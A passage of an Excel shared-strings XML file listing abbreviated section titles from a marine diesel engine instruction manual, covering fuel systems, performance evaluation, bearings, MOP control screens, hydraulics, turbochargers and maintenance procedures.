  <si>
    <t>Fuel Oil</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressurised Fuel Oil System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel Treatment</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PERF. EVALU.+GENERAL OPERATI</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Observations during Operation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Evaluation of Records</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cleaning TC and Air Coolers</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Press. Measurements + Eng. Power</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Correction Perform. Parameters</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Estm.Effect. Eng.Power Indic.Dia</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER CONDITION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insp. NIMONIC Exh.Valve Spindles</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARINGS AND CIRCULATING OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Alignment of Main Bearings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Circulating Oil and Oil System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Maintenance of Circulating Oil</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Turbocharger Lubrication</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CaMSh.Lubr. Eng. w.Uni-Lube Syst</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic System - ME-B Engines</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WATER COOLING SYSTEMS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cooling Water Treatment</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION BOOK VOL.II</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRONT PAGE, LOGO VOL-II</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INTRODUCTION, VOL-II.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION BOOK VOL.III</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INTRODUCTION, VOL. III</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STARTING, MANOEUVRING + RUNNING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Man.Contr. Eng.SideContr.Console</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Change over Norm. to Man.Control</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sequence Diagram - FPP Plant</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Contr.Room, STOP - Safety System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ECR Control, START, AHEAD,AST.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ESC CC,STOP,START,AHEAD,AST.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sequence Diagram CPP Plant</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRC, STP,STA,AH,AST. Safety Syst</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BC, Restart Eng. Show.START,AH.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>R.C. STOP,START - Safety System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Control ESCl Consol, STOP, START</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>C.R. Control, STOP - Safety Syst</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>C.R. Control, START,AHEAD,ASTERN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Control  ESCC, STP,STA,AH,AST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engine Control System Diagram</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Diagram Manoeuvring System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOP Overview</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOP Alarm List</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOP Event Log</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOP Manual Cut-Out List</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOP Channel List</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOP Operation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOP Status</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOP Process Information</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOP Cylinder Load</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOP Mean Pressure - ME-B</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOP Hydraulic System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOP Scavenge Air</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOP Cylinder Lubricators</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOP System View - I/O Test</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOP Invalidated Inputs</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOP Network Status</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOP Set Time</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOP Version</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>R.M.C. STOP,START - Safety Syst.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sequence Diagram - Starting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sequence Diagram - Loading</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Start Air System MC-S</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>R.C. STOP, FPP - 26-46 MC/MC-C</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>R.C. AH,AS, FPP - 26-46MC/MC-C</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Man.Ctr.,ESCC, STP,AH,AS,ST, FPP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Safety Sh.Down, FPP - 26-46MC/-C</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>R.C. STP,START, CPP-Pl. 26-46MC/</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>M.C.ESCC, STP,AH,AS,START,CPP 26</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Man. Override Zero-Pitch Block.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cutting Cylinders out of Action</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Scavenge Air Drain Pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cutting Turbocharger out of Act.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Turbocharger Surging</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Scav.Air Spaces - Fire Ext.Syst.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Compon. Hydr.Syst. - Hydr. Cyl.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Componen. Hydr.Syst.(Accu.Block)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Residual Fuel Standards</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel Oil Pipes on Engines</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel Oil Centri. - Modes Operat.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Centr.FlowRate+Sep.Temp. - PH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Preheati. H.F.O. - Prior Inject.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>F.Oil System - Fr.Water Homogen.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PERFORM. EVALU. + GEN. OPERATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Load Diagram - Propulsion alone</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Load Dia.Prop. + M.Eng.Generator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Performance Observations</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Readings relating,  Thermo.Cond.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Synopsis DiagraMS for Engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Synopsis Diagram. - Eng. - Pmax</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Synopsis Diagram. - Eng. - Pe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Synopsis Diagram. - Turboch.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Synop.Dia., TC Comp.+Turb., Psav</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Synopsis DiagraMS - Air Cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dry Cleaning of TC, Turbine side</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Wet Cleaning Turbocharger</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Air Cooler Clean. Syst. - Option</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Normal Indicator Diagram</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adjustment of Indicator Drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Faulty Indicator DiagraMS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Inform. from Indic. + Draw Diagr</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Using the Planimeter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Corr.ISO Ref. Amb.Cond.-Max. C.P</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Corr.ISO Ref.Amb.Con.-Exh. Temp.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Corr.ISO Ref.Amb. - Comp.Pressur</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Corr.ISO Ref.Amb.Cond.-Scav.Pres</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cor.ISO Ref.Am.Con.Ex. read.Pmax</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Calc. of Compressor Efficiency</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Calcalation of TC Efficiency</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Power Estimation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TC Comp.Wheel - Dia.+Slip Factor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insp. through Scavenge Ports</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insp. - Scavenge Ports - Record</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insp. through Scav.Ports - Symb</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insp. through Scav.Ports - Pictu</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insp. through Scav.Ports - Evalu</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Factors Influencing Cyl. Wear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Abrasive Particles</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Abrasive Particles - Example 2.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Abrasive Particles - Example 3.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cyl.Oil Feed Rate during Run.-In</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder Condition Report</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Calc. of Condensate Amount</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder Lubricating Oil Pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Running-in Load</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARINGS, AND CIRCULATING OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main Bearing - Thick Shell Desig</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main Bearing - Thin Shell Design</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main Bearing - Assemblies</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide Shoes and Strips</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thrust Bearing - Assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CaMShaft Bearing - Assemblies</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insp. Bearings - Record.Observ</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insp.Bearings - Loc. Damage in S</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Acc.Crit.,Tin-Alu Bear. w ov.lay</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insp.Bear. Loc. of Dam. Pin/Jour</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insp. of Bearings - Observations</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insp. Bearings - Insp.Rec.,Examp</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insp.Bearings - Insp.Rec., Blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cr.shaft Deflec.-Report: Autolog</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cranksh Deflection - Limts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Circ.O.S.Outs.Eng. w Uni-Lube Sy</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Circ.O.S.Outs Eng. w Uni-Lube Sy</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Circul. Oil System - Inside Eng.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flush. of M.Lub.Oil Syst. - Loca</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flush. of M.Lub Oil Syst.- Check</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flush. M.Lub Oil Syst.-Flush.Log</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CleanSyst, Stuff.BoxDrainOil,Opt</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CS.Lub.O.Pip,Eng.w Uni-Lube Syst</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CS.Lub.O.Pip.Eng.w Uni-Lube Sys</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flush. CaMShaft Lubr. Oil Syst.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Turbocharger Lubr. Oil Pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Check Measurements</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gear Driven HPS, ELFI + ELVA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gear Driven HPS and ELVA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gear Dr. HPS,ELFI +ELVA,Sep. LPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gear Dr. HPS + FIVA, Sep. LPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Electr.Driven HPS +FIVA, Sep.LPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Electrical Driven HPS and FIVA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6L42MC/ME KMU</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Comb. HPS, Common LPS + FIVA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Combi. HPS, Separate LPS + FIVA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gear Driv. HPS+FIVA, Common LPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ME/-C ,Detec.Malf.+Leak Hyd.Syst</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Throt. Valve F.O. Press. Booster</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Drainholes in HCU block</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Level switch ME Cyl. Lubricator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydr.Contr.Oil Syst.,Separat.LPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Double Wall Piping</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing Wear Monitor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Propeller Shaft Earthing Device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Jacket Cooling Water System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Preheat. of Jacket Cooling Water</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER COVER, DATA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON ROD STUFF.BOX DATA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL. LUBRICATOR, DATA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RECIPROCATING PARTS, DATA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKSHAFT DEFLECTIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN TIGHTENER, DATA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT BEARING, DATA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REPL. CAMS ON CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Chain Tightener 1"</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEAR DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDRAULIC PUMPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL VALVES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Multi-Purpose Controller</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HIGH-PRESSURE PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH. VALVE ROLLER GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH.VALVE SP.RUNNING,OPEN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL PUMP LEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL PUMP CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL PUMP SUCTION VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL PUMP PUNCTURE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL PUMP SHOCK ABSORBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL PUMP ROLLLER GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL PUMP SPEC. RUNNING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>F/O PRESS.BOOST,TOP COV.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>F/O PRESS BOOST, SUC.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR COOLER ELEMENT, DATA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NON-RETURN VALVE, TH DATA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AUXILARY BLOWER, DATA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUTTERFLY VALVES, DATA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURBOCHARGER TURBINE,DATA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WATER MIST CATCHER, DATA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gas Bypass Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Turbocharger, Special Running</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Turbocharger, Cut Out</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY VALVE, DATA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RELIEF VALVE, DATA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCAV.AIR REC.SAFETY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>H.D./END CHOCK BOLTS(IRON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLD.DOWN+END CHOCK,DATA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STAY BOLTS, DATA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Top Bracing - Arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Top Bracing - Hydraulic System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Top Bracing - Accumulator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic Tools, Data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic Nut, Data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Standard Tightening Torques, Dat</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Torque Spanner, Data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tightening Gauge, Data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Screws and Nuts, Data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cable Connections</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic Ring, Data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lubricating , Data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>S-INSTRUCTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON ROD STUFF.BOX PROC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RECIPROCATING PARTS PROCE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFTBEARING,PROCEDURE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HIGH PRESSURE PIPE,PROCE.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH.VALVE ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH. VALVE CAM PROCEDURE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VIT SYSTEM, PROCEDURE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUELPUMP BARREL ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUELPUMP SUCTION VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUELPUMP PUNCTURE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL PUMP, SHOCK ABSORBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>F/O PRESS.BOOST, TOP COV.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AUXILIARY BLOWER,PROCEDU.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUTTERFLY VALVES, PROC.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURBOCH. TURBINE,PROCEDU.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WATER MIST CATCHER,PROCE.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY VALVE, PROCEDURE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RELIEF VALVE, PROCEDURE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>H.DOWN/END CHOCK B.,PROC.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Crankcase Oil Outlet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TIGHTEN.TORQUE, STANDARD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TIGHTENING GAUGE, PROCED.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREWS AND NUTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDRAULIC RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSS SECTION THROUGH ENGine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ORDERING OF INSULATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Designations and Symbols</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Software Licence, Std.Conditions</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder Cover - Hydraulic Ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder Cover - Pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>High-Pressure Pipe - 4-Stroke</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Top Cover - 4-Stroke</t>
